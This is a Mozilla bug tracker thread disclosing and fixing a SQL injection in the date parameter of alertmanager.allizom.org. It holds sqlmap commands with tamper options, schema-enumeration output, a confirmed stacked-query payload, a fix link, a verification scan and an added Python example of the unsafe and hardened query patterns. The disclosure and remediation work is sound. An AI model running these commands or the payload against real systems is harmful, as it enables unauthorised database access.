Bug 1293111 - SQL injection vulnerability on alertmanager.allizom.org
Status: RESOLVED FIXED
Opened 8 years ago; closed 8 years ago
Category: Websites :: Other, defect
Tracking: Not tracked
Reporter: griffin.francis.1993 (Unassigned)
Keywords: reporter-external, sec-high, wsec-sqli
User Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36

Steps to reproduce:

Hello,

The URL alertmanager.allizom.org/data/setadetails/?date= is vulnerable to SQLI via the date parameter. To validate this I issued the following command to SQLMAP:

C:\Users\Griffin\Desktop\sqlmap>sqlmap.py -u "alertmanager.allizom.org/data/seta/details/?date=" --random-agent --tamper=space2comment --schema --threads=10

The following schema was returned (I did not proceed from here):

web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7
back-end DBMS: MySQL 5.0.11
[16:17:29] [INFO] enumerating database management system schema
[16:17:29] [INFO] fetching database names
[16:17:29] [INFO] fetching number of databases
[16:17:29] [INFO] resumed: 8
[16:17:29] [INFO] resumed: information_schema
[16:17:29] [INFO] resumed: alertbot
[16:17:29] [INFO] resumed: alerts
[16:17:29] [INFO] resumed: mysql
[16:17:29] [INFO] resumed: ouija
[16:17:29] [INFO] resumed: ouijatest
[16:17:29] [INFO] resumed: performance_schema
[16:17:29] [INFO] resumed: test

Actual results:

The date parameter does not properly sanitize against malicious input.

Expected results:

The above information should not have been returned back within the SQLMAP response.
Comment 1•8 years ago
Griffin: thanks, the above seems pretty self-describing. I'll do some testing and see how bad it is.
Status: UNCONFIRMED → NEW
Ever confirmed: true
Comment 2•8 years ago
Griffin: I tried briefly to confirm your observations using the latest sqlmap (1.0.8.15#dev) with the above parameters. It didn't return the same results as you have above. Would you mind sharing exactly what version of sqlmap you're using and whether the above parameters were the exact parameters used to enumerate the DB list?
Flags: needinfo?(griffin.francis.1993)
Comment 3•8 years ago
Here are my results output from a slightly more tuned scan, just for transparency...

$ python ./sqlmap.py -u "alertmanager.allizom.org/data/seta/details/?date=1" --random-agent --tamper=space2comment --schema --threads=10 --dbms mysql

[sqlmap banner] {1.0.8.15#dev}
http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 20:38:32

[20:38:32] [INFO] loading tamper script 'space2comment'
[20:38:32] [INFO] fetched random HTTP User-Agent header from file '/Users/jclaudius/code/sqlmap-dev/txt/user-agents.txt': 'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.458.0 Safari/534.3'
[20:38:32] [INFO] testing connection to the target URL
[20:38:32] [INFO] testing if the target URL is stable
[20:38:33] [INFO] target URL is stable
[20:38:33] [INFO] testing if GET parameter 'date' is dynamic
[20:38:33] [WARNING] GET parameter 'date' does not appear dynamic
[20:38:33] [WARNING] heuristic (basic) test shows that GET parameter 'date' might not be injectable
[20:38:33] [INFO] testing for SQL injection on GET parameter 'date'
[20:38:33] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:38:35] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[20:38:35] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[20:38:36] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[20:38:36] [INFO] testing 'MySQL inline queries'
[20:38:36] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[20:38:36] [WARNING] time-based comparison requires larger statistical model, please wait.... (done)
[20:38:37] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[20:38:37] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:38:45] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[20:38:52] [WARNING] GET parameter 'date' is not injectable
[20:38:52] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp')

[*] shutting down at 20:38:52
Comment 4•8 years ago
Project Wiki Page: https://wiki.mozilla.org/Auto-tools/Projects/AlertManager
Source Repo: https://github.com/jmaher/alert_manager
Comment 5•8 years ago
Looks like there may have been a typo above. Corrected URL: http://alertmanager.allizom.org/data/setadetails/?date=
Comment 6•8 years ago
Ok, using the newly corrected URL, I was able to confirm this SQLi vulnerability.

...SNIP...
sqlmap identified the following injection point(s) with a total of 73 HTTP(s) requests:
---
Parameter: date (GET)
    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries (comment)
    Payload: date=';SELECT SLEEP(5)#
---
[21:11:30] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[21:11:30] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7
back-end DBMS: MySQL > 5.0.11
...SNIP...
Updated•8 years ago
Flags: needinfo?(griffin.francis.1993)
Comment 7•8 years ago
jmaher: I see you're one of the more prominent developers of alertmanager. Could you please take a look at this first thing tomorrow and see if we can get a code fix?
Flags: needinfo?(jmaher)
Comment 8•8 years ago (Reporter)
Thanks for the confirmation Jonathan. Much appreciated.
Updated•8 years ago
Summary: SQLI on alertmanager.allizom.org → SQL injection vulnerability on alertmanager.allizom.org
Updated•8 years ago
Flags: sec-bounty?
Comment 9•8 years ago
Updated: https://github.com/mozilla/ouija/commit/8ab444e1c80e603758759c1c71417b0a53ede131. This is on the live server; thanks for pointing this out.
Flags: needinfo?(jmaher)
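For readers who want to see the class of defect and the class of fix this bug is about in code, the following is an added example. It is not code from alert_manager or ouija and not the contents of the linked commit. It uses sqlite3 as an in-memory stand-in for the MySQL backend named in the report; the table name seta_details and its columns are assumptions, and the sample rows are constructed. The only injection string it uses is the payload sqlmap reported in Comment 6, and the example shows why strict validation plus parameter binding neutralises it.

```python
"""Date parameter handling: the injectable pattern beside a hardened one.

Added example for this bug, not code from alert_manager or ouija and not the
contents of the linked commit. sqlite3 stands in for the MySQL backend the
report names; the table and column names are assumptions.
"""
import re
import sqlite3
from datetime import date

# The injection payload sqlmap reported in Comment 6 of this bug.
REPORTED_PAYLOAD = "';SELECT SLEEP(5)#"

# Exactly YYYY-MM-DD; used with fullmatch so nothing may precede or follow it.
DATE_RE = re.compile(r"\d{4}-\d{2}-\d{2}")


def build_query_unsafe(date_param):
    """The vulnerable pattern: the raw request parameter is spliced into the
    statement text. A quote in the value closes the literal, and where the
    driver allows multiple statements the text after ';' runs as a second
    statement, which is the 'stacked queries' finding in Comment 6.
    Returned as text only; it is never executed here."""
    return ("SELECT id, platform, result FROM seta_details "
            "WHERE date = '%s'" % date_param)


def validate_date(date_param):
    """Return the value if it is a real YYYY-MM-DD calendar date, else None.
    Rejecting anything that is not a date keeps the payload from reaching
    the database at all."""
    if not isinstance(date_param, str) or DATE_RE.fullmatch(date_param) is None:
        return None
    try:
        date.fromisoformat(date_param)  # rejects 2016-02-30 and the like
    except ValueError:
        return None
    return date_param


def fetch_details_safe(conn, date_param):
    """The hardened pattern: validate first, then bind the value as a query
    parameter so the driver sends it as data, never as statement text.
    Returns [] for invalid input; a web handler would answer HTTP 400 there."""
    valid = validate_date(date_param)
    if valid is None:
        return []
    cur = conn.execute(
        "SELECT id, platform, result FROM seta_details WHERE date = ? ORDER BY id",
        (valid,),
    )
    return cur.fetchall()


def make_sample_db():
    """Constructed sample rows standing in for the alertmanager data."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE seta_details "
                 "(id INTEGER PRIMARY KEY, date TEXT, platform TEXT, result TEXT)")
    conn.executemany(
        "INSERT INTO seta_details VALUES (?, ?, ?, ?)",
        [(1, "2016-08-08", "linux64", "pass"),
         (2, "2016-08-08", "win7", "fail"),
         (3, "2016-08-09", "linux64", "pass")],
    )
    return conn


if __name__ == "__main__":
    db = make_sample_db()
    print("unsafe SQL text :", build_query_unsafe(REPORTED_PAYLOAD))
    print("valid date      :", fetch_details_safe(db, "2016-08-08"))
    print("reported payload:", fetch_details_safe(db, REPORTED_PAYLOAD))
```

The two defences are independent: the validator alone would have rejected the reported payload, and parameter binding alone would have sent it to the server as a string literal to compare against the date column. Keeping both means a future change to the date format, or a second code path that skips the validator, does not silently reopen the hole.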
Comment 10•8 years ago
I also worked with jmaher on this and did a second pass with sqlmap. Overall result is that it seems fixed. Here's the results of my sqlmap verification:

$ python ./sqlmap.py -u "alertmanager.allizom.org/data/setadetails/?date=1" --random-agent --tamper=space2comment --schema --threads=10 --dbms mysql

[sqlmap banner] {1.0.8.15#dev}
http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 12:36:25

[12:36:25] [INFO] loading tamper script 'space2comment'
[12:36:25] [INFO] fetched random HTTP User-Agent header from file '/Users/jclaudius/code/sqlmap-dev/txt/user-agents.txt': 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2a1pre) Gecko/20090428 Firefox/3.6a1pre'
[12:36:25] [INFO] testing connection to the target URL
[12:36:26] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[12:36:26] [INFO] testing if the target URL is stable
[12:36:27] [INFO] target URL is stable
[12:36:27] [INFO] testing if GET parameter 'date' is dynamic
[12:36:27] [WARNING] GET parameter 'date' does not appear dynamic
[12:36:27] [WARNING] heuristic (basic) test shows that GET parameter 'date' might not be injectable
[12:38:08] [INFO] testing for SQL injection on GET parameter 'date'
[12:38:08] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:38:12] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[12:38:13] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[12:38:15] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[12:38:15] [INFO] testing 'MySQL inline queries'
[12:38:15] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[12:38:15] [WARNING] time-based comparison requires larger statistical model, please wait.... (done)
[12:38:18] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[12:38:20] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[12:38:43] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[12:39:06] [WARNING] GET parameter 'date' is not injectable
[12:39:06] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp')

[*] shutting down at 12:39:06
Updated•8 years ago
Status: NEW → RESOLVED
Closed: 8 years ago
Resolution: --- → FIXED
Comment 11•8 years ago
jmaher: many thanks for the quick turnaround on this!
Comment 12•8 years ago
Griffin: we discussed with the bounty team just now, even though this site isn't enrolled in the bounty program and a compromise of the service wouldn't be critical based on what it's holding and where it lives, we believe the severity of the bug is sufficient to imply RCE or service compromise impact and thus we're going to reward a bounty in this case.
Flags: sec-bounty? → sec-bounty+
Comment 13•8 years ago (Reporter)
Thanks for the turnaround on this report. It is much appreciated.
Updated•1 month ago
Keywords: reporter-external